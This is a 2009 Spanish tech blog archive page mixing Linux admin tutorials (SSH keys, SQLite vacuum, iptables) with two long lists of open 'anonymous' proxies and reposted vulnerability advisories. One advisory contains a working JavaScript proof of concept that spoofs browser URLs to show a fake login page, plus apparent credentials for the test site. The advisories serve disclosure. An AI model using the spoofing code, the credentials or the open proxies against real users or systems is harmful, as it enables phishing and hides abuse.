[Tutorial] gtk-recordMyDesktop, grabando tu escritorio con sonido

30 agosto 2009 Publicado por cLimbo 3 comentarios

Después de probar y probar al final encontré la manera de que me grabara sonido gtk-recordMyDesktop, el problema era que no me detectaba con la opción que tenia defecto gtk-recordMyDesktop ya que dispongo el micrófono lo tengo en una cámara USB logitech, al ver los log's una vez metida la cámara me di cuenta de que el dispositivo que debo usar es hw:1:


alsa-util.c: Device hw:1 doesn't support 44100 Hz, changed to 16000 Hz.


Lo que hice fue añadir a las opciones del gtk-recordMyDesktop hw:1,0 :


A partir de ahora ya puedo grabar sonido y vídeo :) .

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Evitar un G-Line en el IRC al conectar

26 agosto 2009 Publicado por cLimbo 0 comentarios
Esto no es una critica para desprestigiar al irc-hispano si no intentar ayudar a la gente cuando le pase lo mismo.

Ayer al conectar al IRC cual es mi sorpresa que veo que el servidor de irc-hispano me hace un G-LINE, yo todo extrañado veo el mensaje del motivo y según este tenia abierto el puerto 9091 supuestamente utilizado por la red famosa TOR y claro, yo digo: ¿ como es posible ? :)

sudo fuser -v 9091/tcp
USER PID ACCESS COMMAND
9091/tcp: chakal 9016 F.... transmission

Veo que lo usaba transmission que es un programa famoso para descargar de la red torrent, veo que usa este puerto concretamente al activar el gestor web para manejar transmission remotamente por web (http://ip:9091), vale, ahora yo me pregunto: ¿ esto es un proxy o uso tor ?

El G-LINE supuesto por usar una conexión "no segura" (según ellos) duraba ni mas ni menos que 1 año xD, hay me las ingenie a duras penas con el iphone para conectar al irc y entrar a #opers_help donde al final después de 1 hora me quitaron el ban. Quite transmission para conectar.

No quise cambiar el puerto y tener que volver a mapear de nuevo en el router, según el irc-hispano tienen glineados los puertos: 9001 , 9030 , 9050 , 9051 , 9090 y el 9091 (más información en http://www.irc-hispano.es/ayuda/usuario/34-seguridad) y bueno, mi solución final fue banear los 2 routers que usan un rango de ip's por el cual llegaban los escaneo para detectar si tenia estos puertos abiertos que son: 194.149.72.0/22 y 194.149.73.0/24 (unos cuantos :) ), las reglas de iptables son simples:

sudo iptables -I INPUT -s 194.149.72.0/22 -j REJECT
sudo iptables -I INPUT -s 194.149.73.0/24 -j REJECT

ATENCIÓN: Esto también bloquea la pagina del http://www.irc-hispano.es , si usáis webchat deberéis añadir la siguiente regla:

sudo iptables -I INPUT 1 -s 194.149.73.154 -p tcp --sport 80 -j ACCEPT

Si dudáis sobre los puertos podeis escanear los puertos desde aqui que es del hispano.

Un saludo

Artículo cedido por un conocido; chakal^-^.
Etiquetas: , , ,

¿Cómo fabrica Kingston sus memorias USB?

25 agosto 2009 Publicado por cLimbo 0 comentarios
Hoy daremos un paseo por la planta de producción de Kingston, veremos cómo hacen sus pendrives desde cero;

Problemas con dpkg al actualizar el initrd viejo sin existir

24 agosto 2009 Publicado por cLimbo 0 comentarios
Hoy estaba actualizando mi Acer Aspire One modelo A110 y que sorpresa me llevo cuando había paquetes sin configurar, digo vale, incluso me lo dice en la consola cuando hago la actualización que haga esto:

sudo dpkg --configure -a

Hasta que no hagamos esto no podemos instalar ningún paquete mas. El problema viene cuando intenta crear/actualizar el initrd de un kernel viejo que lo borre ya que uso uno actual y me parece una tontería tener 40 kernel sin usar y mas teniendo solo 8GB de capacidad de disco solo :) . La carpeta de /lib/modules/2.6.28-v5.aspire1 la borre por que uso la versión 2.6.28-generic entonces dpkg se quejaba.

La solución fue borrarla para que no me tocara las narices:

sudo update-initramfs -k 2.6.28-v5.aspire1 -d

En este paso me daba un error, me decía que no existía /boot/2.6.28-v5.aspire1 por lo que le engaño creando el archivo :P

sudo touch /boot/2.6.28-v5.aspire1
sudo update-initramfs -k 2.6.28-v5.aspire1 -d

Ahora si me deja hacer el configure:

sudo dpkg --configure -a

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Compacta y repara bases de datos SQLite

23 agosto 2009 Publicado por cLimbo 0 comentarios
SQLite es un sistema de gestión de bases de datos relacional compatible con ACID, y que está contenida en una relativamente pequeña (~225 kB[1] ) biblioteca en C.

Cuando creamos una tabla, base de datos o datos y estos se han eliminado/borrado se deja el espacio vacío en la misma, este espacio vacío se reutilizarán la próxima vez que se añade nueva información a la base de datos, pero mientras tanto, el archivo de base de datos podría ser más grande. Además, las frecuentes inserciones, actualizaciones, puede causar que base de datos se fragmente.

Por ejemplo firefox mantiene una base de datos en sqlite donde almacena los datos del firefox resulta conveniente compactar para eliminar datos erróneos o borrados de la base de datos.

Para compactar y corregir todos los ficheros sqlite tan fácil como este pequeño script:

for db in `locate '*.sqlite'`; do
sqlite3 'VACUUM' $db 2>/dev/null
done

Para que resulte eficaz deberemos cerrar los programas que usan esta base de datos si no veremos algo como:

SQL error: database is locked

Si no tenemos sqlite3 deberemos de instalarlo:

sudo aptitude install sqlite3


Hay alguna aplicación que nos permite visualizar los datos incluso añadir datos nuevos o crear bases de datos, tablas:

sudo aptitude install sqlitebrowser


Es tan fácil como decirle a nuestro gestor de archivos que los ficheros sqlite los abra con sqlitebrowser, a partir de este momento podremos operar sobre la base de datos y nos resultara útil también para compactar la base de datos ya que este programita cuenta con dicha utilidad:



Desde la linea de comandos podremos interactuar con nuestra base de datos de esta manera:

sqlite3 db.sqlite


La sintaxis es prácticamente igual a MySQL y os resultara familiar si sabéis MySQL.

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Autenticación automática en ssh usando una clave rsa

22 agosto 2009 Publicado por cLimbo 0 comentarios
Yo normalmente uso mucho ssh para administrar mi maquina en red. Cada vez que entro al servidor ssh por defecto tiene configurada la autentificación por password para acceder a la maquina pero hoy he cambiado de método, ahora uso identificación basada en RSA, esto es mas seguro y mas cómodo, seguro por que la clave aunque la conozcan no pueden entrar y es mas cómodo por que no tenemos que meter la clave, con tan solo:

ssh usuario@host

vale :)

Para hacer este proceso lo primero que debemos hacer es permitir la autentificación RSAAuthentication y configurar la AuthorizedKeysFile donde están las claves de paso para las maquinas que forman el anillo de confianza en la red, para ello editamos el archivo /etc/ssh/sshd_config en la maquina donde esta el servidor ssh al cual pretendemos entrar:

sudo nano /etc/ssh/sshd_config

Buscamos estas claves y en caso que estén comentadas las descomentamos:
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

También he deshabilitado el acceso ssh mediante password para que en el caso que no posean la key no accedan por password:
PasswordAuthentication no

Tener en cuenta que RSAAuthentication es para SSH1 y PubkeyAuthentication para SSH2, de todas maneras no pasa nada por descomentar ambas, salvamos el fichero y reiniciamos el demonio:

sudo /etc/init.d/ssh restart


Ahora en la otra maquina o maquinas creamos la clave RSA y la exportamos al servidor ssh:

ssh-keygen -t rsa
cat .ssh/id_rsa.pub | ssh usuario@host "cat - >> .ssh/authorized_keys"


Con esto ya esta listo, para acceder tan simple como:

ssh usuario@host


Nos pedirá una clave la 1 vez en la sesión, esta se almacenara y no nos la pedirá mas veces hasta que no cerremos sesión. Si estamos por consola sin X tenemos que ejecutar estos 2 comandos:

ssh-agent /bin/bash
ssh-add


Nos pedirá igualmente la clave de paso y ya no nos la pedirá mas veces hasta que cerremos la sesión. Podemos guardarlo en nuestro ~/.bashrc para ahorrarnos el proceso:

echo "ssh-agent /bin/bash" >> ~/.bashrc
echo "ssh-add" >> ~/.bashrc


Des esta manera todos los procesos hijos que se inicien a partir de ahora se almacenaran. De igual manera podemos agilizarlo si usamos un entorno gráfico:

echo "ssh-agent /usr/X11R6/bin/X" >> ~/.xinitrc
echo "ssh-add" >> ~/.bashrc


Una cosa importante es cambiar los permisos del archivo authorized_keys del servidor ssh para que sea solo visible por el usuario y ningún usuario no autorizado pueda leer la clave:

chmod 600 .ssh/authorized_keys


Hacemos lo mismo en nuestra maquina con el archivo id_rsa.pub y id_rsa:

chmod 600 .ssh/id_rsa*


Esto es uno de los métodos mas seguros y nos ahorramos problemas ya que como sabéis la gente siempre intenta entrar por fuerza bruta a servidores ssh por la red y como tenemos RSA no podrán acceder a menos que posean el archivo id_rsa.pub en su sistema cosa poco menos que probable a no ser que físicamente acceda al pc.

Un saludo

Artículo cedido por un conocido; chakal^-^.

Implementación de WebChat

Publicado por cLimbo 0 comentarios
A través de aquí podrás acceder a nuestro canal, alojado en iRC-Hispano, con referencia a algún problema y/o duda no resuelta en el blog.

Etiquetas: ,

Proxies HTTP Anónimos 17-08-09

18 agosto 2009 Publicado por cLimbo 0 comentarios
124.207.168.48:808
164.77.170.67:8080
174.142.24.201:3128
193.220.87.121:8080
194.250.131.225:80
194.106.115.116:80
194.224.84.3:80
194.3.18.22:80
195.139.235.200:80
200.43.221.67:80
200.57.93.231:8080
201.12.64.153:80
190.72.25.48:80
210.51.184.62:80
212.138.84.62:8080
217.110.205.60:80
218.56.64.212:8080
221.131.124.22:80
221.181.244.161:80
218.252.41.203:80
202.116.32.92:8080
221.238.193.163:80
61.7.161.228:3128
88.200.224.246:3128
69.13.197.165:80
98.129.147.1:80
74.206.98.202:8080
77.221.99.10:80
77.94.32.98:80
212.24.238.155:80
78.143.252.226:80
93.187.17.201:80
97.65.164.212:8080
110.8.253.100:80
113.253.14.210:808
114.127.246.36:8080
118.98.232.202:8080
118.98.32.34:80
119.167.225.136:8080
121.187.121.189:80
122.155.0.244:3128
124.172.110.158:80
130.208.220.85:80
141.223.237.76:8080
146.242.199.231:80
146.83.8.31:8080
147.102.85.32:80
147.171.65.3:80
148.244.223.236:80
157.100.50.179:3128
159.149.133.193:80
160.78.84.1:443
173.32.83.25:9090
174.129.114.178:80
174.142.104.57:3128
174.142.32.143:80
174.143.236.197:80
190.102.206.48:8080
190.12.67.130:8081
190.14.254.162:443
190.153.90.114:80
190.196.15.125:8080
190.196.15.157:80
190.27.194.90:8080
192.107.168.129:80
193.109.166.22:3128
193.171.32.6:80
193.188.70.3:8080
193.210.148.195:80
193.251.88.4:8080
193.254.217.250:8080
194.100.9.12:80
194.72.50.238:80
195.154.158.18:80
195.209.224.91:3128
195.22.241.178:3128
195.229.62.157:8080
200.131.43.180:8080
200.135.2.171:49400
200.164.74.75:8080
200.31.42.3:80
200.46.3.46:3128
200.54.148.34:80
200.65.127.161:3128
200.65.127.161:8083
201.15.232.96:8080
201.17.162.45:8080
201.18.52.154:6588
201.225.188.9:3128
201.225.226.68:8080
201.226.192.11:8080
201.92.253.33:3128
202.101.180.226:8080
202.131.98.165:80
202.143.155.44:80
202.175.26.145:80
202.3.217.125:8080
202.44.4.85:8081
202.54.61.99:8080
202.59.28.104:80
202.99.29.27:80
203.110.245.250:80
208.106.250.202:80
208.109.163.53:8081
208.79.234.72:8080
208.96.213.149:80
209.47.251.243:80
209.98.77.24:3128
210.211.148.46:8080
210.212.130.54:8090
211.141.86.152:8080
211.183.3.9:80
211.38.131.22:80
212.103.139.75:80
212.191.130.227:8080
212.31.225.83:3128
217.219.147.141:80
218.108.44.170:808
218.242.239.61:8080
218.248.21.194:80
218.25.99.135:808
218.50.52.210:80
218.56.64.210:8080
219.150.144.58:80
219.239.11.182:80
219.37.208.150:8080
219.94.84.102:8080
220.66.203.5:80
221.204.253.154:8088
222.41.10.70:1337
222.83.228.34:8080
24.127.136.205:9090
41.210.252.11:8080
58.145.187.8:8080
58.176.56.189:9090
58.24.153.235:8080
58.248.74.20:8089
58.27.140.58:8080
58.63.109.66:8080
58.64.162.228:80
59.162.33.158:8080
59.36.98.154:80
59.77.6.183:808
60.63.26.246:80
61.144.66.53:8080
61.152.182.239:80
61.167.117.83:8080
61.189.86.48:8080
62.149.211.207:8080
62.213.87.20:80
62.33.11.104:3128
63.119.14.20:80
64.186.132.60:2401
65.182.203.38:80
66.114.252.244:80
66.119.43.30:80
66.119.43.31:80
66.119.43.34:80
66.119.43.36:80
66.119.43.37:80
66.173.241.16:80
66.55.8.51:13401
69.7.105.30:8080
70.69.189.13:9090
71.207.241.124:707
74.222.1.99:8080
75.101.188.125:80
75.145.241.73:8080
77.223.175.40:8080
77.88.66.251:8000
78.108.105.47:3128
78.36.103.231:8080
79.160.177.10:8080
79.98.40.53:80
80.13.219.238:3128
80.255.197.16:9090
81.180.75.142:8080
82.145.197.249:8080
83.18.28.130:3128
83.232.98.229:3128
83.69.207.42:3128
83.96.39.196:80
85.115.20.76:8080
85.214.113.101:1113
85.249.33.2:3128
87.229.73.113:80
88.191.108.193:3128
88.191.63.27:8080
88.201.172.105:3128
88.249.32.247:8088
88.62.97.132:8080
89.144.101.12:8080
89.149.208.95:80
89.165.40.10:8080
89.96.169.141:80
90.156.232.52:3128
91.112.157.214:1080
91.121.135.73:80
91.121.85.162:80
91.121.91.61:3128
91.201.11.86:3128
92.243.188.180:3128
92.61.98.3:80
93.63.233.254:80
94.143.184.33:80
94.23.217.145:80
95.57.220.130:8080
98.222.42.233:80
75.118.136.75:58159
212.62.110.20:8080
79.160.177.10:8080
210.212.160.101:8080
118.98.160.102:8080
218.56.64.210:8080
91.92.165.253:3128
88.191.46.33:3128
201.144.213.18:3128
218.14.227.197:3128
148.233.239.23:3128
189.109.46.210:3128
219.93.175.67:3128
211.95.176.6:808
188.122.239.127:808
212.116.219.102:443
208.100.40.34:80
213.203.241.210:80
61.135.179.52:80
86.108.4.147:80
212.62.97.23:80
212.62.97.20:80
196.213.174.130:3128
200.40.156.66:8080
190.128.225.182:8080
203.172.242.148:80
125.162.237.127:8080
218.103.42.27:80
196.213.180.50:8080
61.144.66.53:8080
195.87.102.7:80
202.129.49.234:8080
202.145.3.106:3128
200.217.70.39:80
203.172.243.100:80
95.57.220.130:8080
58.64.162.228:80
114.57.163.37:8080
202.138.251.190:8080
160.78.84.1:443
194.158.247.125:8080
196.41.132.28:80
Etiquetas: , , ,

Multiple Browsers Fake url folder & file Same origin Spoof

15 agosto 2009 Publicado por cLimbo 0 comentarios
#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Artículo original: http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html
##########################################

##############
Resumen
##############

Un usuario abre su navegador e intenta entrar en http://www.host.com/admin/admin.php y se encuentra en esta URL
el servidor remoto y si el usuario tiene privilegios, puede acceder al archivo admin.php

Si el archivo admin.php no existe en el servidor al usuario le da un erorr 404 el servidor http.

Si el usuario intenta entrar a http://www.host.com/admin/ y esta dir no está en el servidor, el usuario obtiene de nuevo un http error 404.

Si el usuario pulsa el botón recargar la página vuelve a cargar el contenido y si el usuario presiona CTRL + F5 actualiza todo el contenido de la página.

Algunas veces los errores http como 404, 403, etc son administrados por una tercera parte, una barra de herramientas, o con un contenido predefinido dinámico construido en el interior del navegador.

#######################
Explicación
#######################

Múltiples navegadores tienen un error en esta solicitud de respuesta que permiten a un atacante suplantar la url o falso el contenido de un archivo o ruta inexistente o falsa la url y el contenido de un archivo o una ruta de confianza.

También un atacante puede "trampear" la falsa url del explorador en internet y cuando el usuario pulse la tecla F5 o el botón Actualizar, muestre la página con el contenido falso o si el usuario presiona CTRL + F5 la página muestre el contenido falso, sólo en este último caso, el navegador Opera no funciona.

##################
Pruebas
##################

He estado probando con Windows XP Home SP3 con todos los parches.

Para la prueba vamos a escribir una secuencia de comandos como:

####################
CÓDIGO FUENTE DE POC
####################
Prueba de Concepto en línea => http://cmspatch.200u.com/urlspoof.html
<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a> this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## FIN DEL CÓDIGO #####

Lo guardamos como c:/test/urlspoof.html por ejemplo.

Yo uso una alerta para mostrar la verdadera window.location.

para la prueba he abierto el archivo con file:/// que es un manejador de protocolo y remoto, para la prueba he cargado el archivo en un servidor: un apache en windows 2003 y en un Apache sobre Linux Red Hat.

servidor de windows:

Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

servidor de linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com
en todos los casos de prueba el servidor envía la correctamente la respuesta HTTP.

########################
Navegadores afectados en local
########################

Para esta prueba el uso de archivos i manejador de protocolo y
sólo archivo de prueba y falso camino falso.

1 - Firefox 3.5.1 y 3.5.2
urlspoof es abierto a través del archivo c:/test/urlspoof.html y al hacer clic en cualquier función en falso al firefox, muestran la falsa url y el contenido. (firefox 3.5.2 no parece vulnerable)

2 - Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
urlspoof abierto a través de archivo c:/test/urlspoof.html y hacer clic en cualquier función en falso al Lunascape muestra los casos de url falsa y el contenido falseadas.

3 - Orca 1,2 build 2 no parecen vulnerables, pero cuando busca el archivo al añadir a los navegadores wyciwyg url://4/ ejecuta el contenido falso.

4 - Flock 2.5.1
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos muestran la url falsa y el contenido falseadas.

5 - K-Meleon 1.5.3
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en falso en cualquier función en todos los casos K-Meleon muestra la url falsa y el contenido falseadas.

6 - SeaMonkey 1.1.17
urlspoof es abierto a través del archivo c:/test/urlspoof.html y haga clic en
falso en cualquier función, en todos los casos muestra la url falsa y el contenido falseadas.

7 - Avant 11,7 build 36
urlspoof es abierto a través de archivo c: /prueba/urlspoof.html y haga clic en falso en cualquier función, en todos los casos muestran la url falsa y el contenido falseadas.

Google Chrome 2.0.172.39 (Build oficial)
escribe en todos los casos en about: blank.

Internet Explorer 8 no parece vulnerable a través de file: protocol

########################
Navegadores remotos afectados
########################

Para esta prueba de seguridad, subid el archivo a un servidor y busca el archivo a través de http://host.com/urlspoof.html

1 - Internet Explorer 7 y 8
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsa, patch falso, y "pseudo-bypass"

2 - Avant 11,7 build 35 y build 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestran el árbol de archivos falsa, patch falso, y "pseudo-bypass" auth basic protection.

1 - Internet Explorer 7 y 8
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y "pseudo-bypass"
autoridades de protección básica.

2 - Avant 11,7 navegador construir 35 y construir 36
Vaya a archivo y haga clic en cualquier enlace, el navegador en todas las
prueba muestran el árbol de archivos falsa, falsa vía, y "pseudo-bypass"
autoridades de protección básica.

3 - Lunascape 5.1.3 y 5.1.4 (Trident swiched a motor)
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las prueba muestra el árbol de archivos falsos, patch falso, y "pseudo-bypass" auth basic protection.

4 - Navegador Maxthon 2.5.3.80 UNICODE
Vaya al archivo y haga clic en cualquier enlace, el navegador en todas las pruebas muestra el árbol de archivos falsos, patch falso, y "pseudo-bypass" auth basic protection.

Google Chrome escribe en todos los casos en el about:blank

#################
Trampa en cuestión
#################

Todas las superficies afectadas de los navegadores, cuando usted está en la url falsa al intentar actualizar la ubicación, a través de CTRL + F5, f5 o similares, el navegador no mostrará un error HTTP 404, que siguen mostrando la ubicación de la página falsa.

Es muy interesante, porque un atacante puede crear un archivo "fantasma" en una dir "fantasma", en el caso de la falsificación de archivos, se puede suplantar cualquier página web en el servidor, con la falsa página, cuando el usuario intenta volver a cargar o recargar el navegador muestra la página falsa: OJO! NO es la ubicación real de la página.

##################€nd ##################

Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
-------

thz Lost ;-)

Bing.com WebmasterAuthenticationInformationPage.aspx XSS

14 agosto 2009 Publicado por cLimbo 0 comentarios

###########################################
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
URL del vendedor: http://ww.bing.com
Reportado: http://lostmon.blogspot.com/2009/08/bingcom-webmasterauthenticationinformat.html
Vendedor avisado: Confirmación vendedor:
###########################################

El motor de búsqueda Bing, contiene un error que permite ataques cross site scripting.
Este defecto existe porque la solicitud no valida correctamente la variable 'authTag para la presentación de 'WebmasterAuthenticationInformationPage.aspx' podría script. Esto permite a un usuario crear una URL especialmente preparada para ejecutar código arbitrario en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, lo que lleva a una pérdida de integridad.

Un atacante puede componer un enlace incorrecto en la variable 'WebmasterAuthenticationInformationPage.aspx' y el consiguiente código, es escribir en dos cajas y en el 'LiveSearchSiteAuth.xml'.

Un usuario remoto puede redactar un enlace incorrecto en la variable de ' WebmasterXMLAuthDownloadPage.aspx', para descargar 'LiveSearchSiteAuth.xml' => es éste el archivo que contiene el código malicioso.

#########
solución:
##########

Que el vendedor cree un parche

#############
Cronología:
#############

Descubierto: 18-junio-2009
notificado al vendedor: 07-08-2009
proveedores de respuesta: 07-08-2009
vendedor respuesta sobre parche: 13-08-2009
publicado: 13-08-2009

################ End #####################

Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
----

thz Lost ;-)

Explicaremos los diseños de los logotipos de algunos sistemas operativos

12 agosto 2009 Publicado por cLimbo 0 comentarios
Parte fundamental de cualquier marca es su imagen y la máxima expresión de esa imagen viene dada por su logotipo. Será el principal pilar encargado de, entre otras cosas, identificar de forma inequívoca determinada empresa.

Tux, el pingüino:


Si hay un pingüino famoso en la red ese es sin duda Tux, la mascota oficial del kernel de Linux. Fue una elección personal de Linus Torvalds, el nombre del bicho es el acrónimo de (T)orvalds (U)ni(X).

Ubuntu, círculo de unidad:



A primera vista parece que el logo de Ubuntu es un simple círculo rojo, naranja y amarillo con unos puntos. Ahora fíjate bien y podrás ver que en realidad son tres personas formando un círculo cogidos de la mano.

Se pretende representar unidad, lo que también tiene relación con el nombre del sistema operativa. Ubuntu es una expresión africana que describe solidaridad y compasión.

Google Chrome OS, la esfera:



Aún no se sabe pero es probable que Chrome OS tome prestado el logotipo del navegador Google Chrome, quizás con pequeños cambios aunque manteniendo la estructura básica.

El logotipo es una esfera con aspecto “robótico” de colores y podríamos decir que está influenciado por varios otros. Desde el de Windows (los colores), las “Pokeballs” de los Pokémon o el juego de memoria Simón. Por otro lado es una poderosa imagen, intenta imitar el globo ocular humano que significa conocimiento y visión.

Redhat, el hombre misterioso:


Personalmente el logotipo de RedHat es de los que más me gusta por el “misterio” que desprende. Justamente esa es la idea que quieren transmitir los del sistema operativa abierto, estar rodeados por una atmósfera enigmática.

Por otro lado se cuenta que el padre de Marc Ewing, uno de los fundadores de la empresa, le regaló un sombrero rojo y blanco (el oficial de los jugadores de lacrosse de la universidad de Cornell) que no se quitaba ni para ir al baño y de ahí nació la idea para el nombre de la distribución y el logotipo (existen varias versiones de esta historia).

Mac OS X, se olvida de la manzana:



La marca principal de Apple es sin duda la manzana con un mordisco en uno de los lados, pero en el 2001 los de Cupertino deciden cambiar radicalmente e introducen una X mayúscula con aspecto metálico para representar a su sistema operativo Mac OS X.

La X es estilo metal brillante y pulido para representar un radical nuevo sistema operativo con menús metálicos y look minimalista.

openSUSE, el camaleón:


La mascota oficial del kernel de Linux es un pingüino como decíamos. Pues bien, al software libre le gustan los animales y la distribución SUSE usa otro para su logo, en este caso un camaleón. Los usuarios lo bautizaron con el nombre de Geeko que sale de contraer la palabra geek (¿hace falta definición?) y gecko, un pequeño lagarto que vive e climas templados.

Vía | ALT1040

Proxies HTTP Anónimos 10-08-09

10 agosto 2009 Publicado por cLimbo 0 comentarios
190.31.107.242:8080
190.139.116.102:8080
218.103.42.27:80
195.87.102.7:80
202.129.49.234:8080
201.248.89.208:8080
160.78.84.1:443
212.24.238.155:80
88.208.222.14:80
88.41.111.190:8080
189.11.127.30:3128
88.191.250.67:8118
221.0.213.155:8080
202.138.238.45:3128
80.26.126.224:8085
203.89.25.133:80
77.242.169.70:8081
218.26.96.68:8080
202.147.189.43:8080
60.253.119.18:8080
76.98.248.124:8085
209.91.156.180:8085
70.188.105.37:8085
83.162.38.83:8080
62.215.182.13:80
202.175.26.145:80
222.68.207.11:80
87.229.73.113:80
66.114.252.244:80
117.32.251.246:80
24.191.64.208:8085
69.112.97.79:8085
24.185.139.186:8085
200.31.42.3:80
89.222.221.123:8080
24.92.61.61:8085
76.110.90.227:8085
70.83.51.114:3128
204.210.154.169:8085
61.164.41.52:8080
24.117.107.217:8085
24.44.90.62:8085
76.20.188.138:8085
76.110.42.90:8085
70.172.242.142:8085
75.131.249.21:8085
174.142.32.143:80
213.249.207.89:8080
64.251.25.192:80
213.212.251.83:8080
207.237.157.205:8080
222.68.206.11:80
70.246.195.107:8085
91.184.202.66:80
212.102.0.104:8080
88.87.129.118:8000
24.190.229.111:8085
68.100.222.185:8085
69.112.167.111:8085
121.187.121.189:80
74.79.200.149:8085
68.193.20.3:8085
24.131.50.28:8085
189.80.205.130:80
61.89.162.75:8080
69.247.184.41:8085
67.163.38.125:8085
70.173.87.125:8085
67.166.225.236:8085
24.19.86.5:8085
68.108.158.132:8085
68.58.35.18:8085
76.104.245.48:8085
82.208.161.153:8080
68.62.246.31:8085
75.51.106.149:8085
85.88.195.34:3128
212.152.63.164:3128
68.227.129.228:8085
200.164.74.75:8080
62.217.43.115:8080
200.175.16.150:8080
72.178.36.94:8085
69.246.46.104:8085
68.60.169.74:8085
119.70.40.100:80
71.197.135.103:8085
114.127.246.36:8080
76.28.241.189:8085
72.218.164.26:8085
68.14.85.22:8085
70.186.168.50:8085
68.49.230.120:8085
68.0.177.107:8085
68.88.56.162:8085
80.148.22.89:8085
61.189.86.48:8080
221.214.27.252:808
193.254.217.250:8080
93.174.165.178:3128
70.119.22.24:8085
212.116.137.248:3128
75.180.33.22:8085
70.117.246.169:8085
67.177.181.169:8085
69.242.15.212:8085
218.132.56.25:80
69.116.204.103:8085
24.186.149.97:8085
68.49.229.9:8085
207.248.228.166:80
62.149.211.207:8080
68.230.225.122:8085
71.237.144.185:8085
203.67.172.47:8080
89.96.169.141:80
24.121.92.213:8085
72.208.32.114:8085
68.150.220.78:8085
68.103.199.151:8085
201.226.192.11:8080
24.230.35.147:8085
200.49.211.8:3128
71.11.249.240:8085
218.210.199.252:3128
190.102.206.48:8080
203.89.25.61:80
206.64.92.16:8000
70.158.130.207:8080
65.189.136.159:8085
77.226.249.230:80
98.156.116.192:8085
196.12.36.225:80
59.34.197.149:8080
59.152.238.51:80
61.28.162.228:3128
212.70.144.34:8085
110.8.253.100:80
210.238.74.137:80
24.175.216.123:8085
24.247.197.233:8085
200.175.97.42:80
97.74.115.75:80
119.167.225.136:8080
24.137.123.91:8085
66.173.241.16:80
24.163.104.46:8085
94.23.50.9:80
24.166.14.228:8085
116.93.16.20:8080
219.94.142.25:80
213.210.208.139:3128
213.197.183.254:81
77.93.197.83:80
69.118.60.157:8085
60.172.223.17:8080
62.213.87.20:80
201.6.252.237:8080
74.54.156.73:80
68.57.83.89:8085
91.121.85.162:80
97.107.130.146:80
190.147.134.6:80
88.191.17.209:443
221.0.213.155:8080
196.40.79.30:8080
204.160.110.126:80
68.2.253.155:8085
70.125.105.1:8085
174.143.232.17:80
212.103.139.75:80
122.169.195.161:80
201.15.232.96:8080
83.161.199.75:80
67.188.164.45:8085
202.44.4.85:8081
202.99.29.27:80
85.115.20.76:8080
200.232.115.145:3128
208.223.222.23:80
72.48.74.62:8085
77.246.52.118:8080
68.106.18.142:8085
190.27.194.90:8080
202.82.86.135:80
222.73.161.195:8080
213.61.56.178:80
221.116.142.90:80
110.8.253.100:80
112.96.28.68:80
114.127.246.36:8080
117.32.251.246:80
119.167.225.136:8080
122.155.0.244:3128
122.169.195.161:80
124.207.102.87:80
125.141.225.11:3128
138.89.197.35:8080
163.153.30.3:80
174.142.104.57:3128
174.142.24.201:3128
174.143.236.197:80
189.29.64.8:6588
190.102.206.48:8080
190.147.134.6:80
190.27.239.157:8080
192.107.168.129:80
192.192.169.230:80
193.188.70.3:8080
193.239.140.120:80
193.252.243.143:80
194.44.144.2:80
194.44.144.3:80
195.229.62.157:8080
196.40.79.30:8080
200.204.62.49:6588
200.31.42.3:80
200.65.127.161:8083
200.65.127.161:3128
201.217.204.22:8080
201.243.35.170:8080
201.251.248.34:3128
202.116.32.92:8080
202.175.26.145:80
202.185.65.3:80
202.188.222.2:8080
202.205.127.228:80
202.213.246.61:80
202.29.15.37:80
202.3.217.125:8080
202.53.12.183:80
202.54.61.99:8080
202.94.144.73:80
202.99.29.27:80
203.241.192.211:9090
207.237.157.205:8080
211.38.131.22:80
212.165.185.138:3128
212.98.50.204:80
213.212.251.83:8080
217.119.210.114:80
218.108.44.170:808
218.24.180.12:80
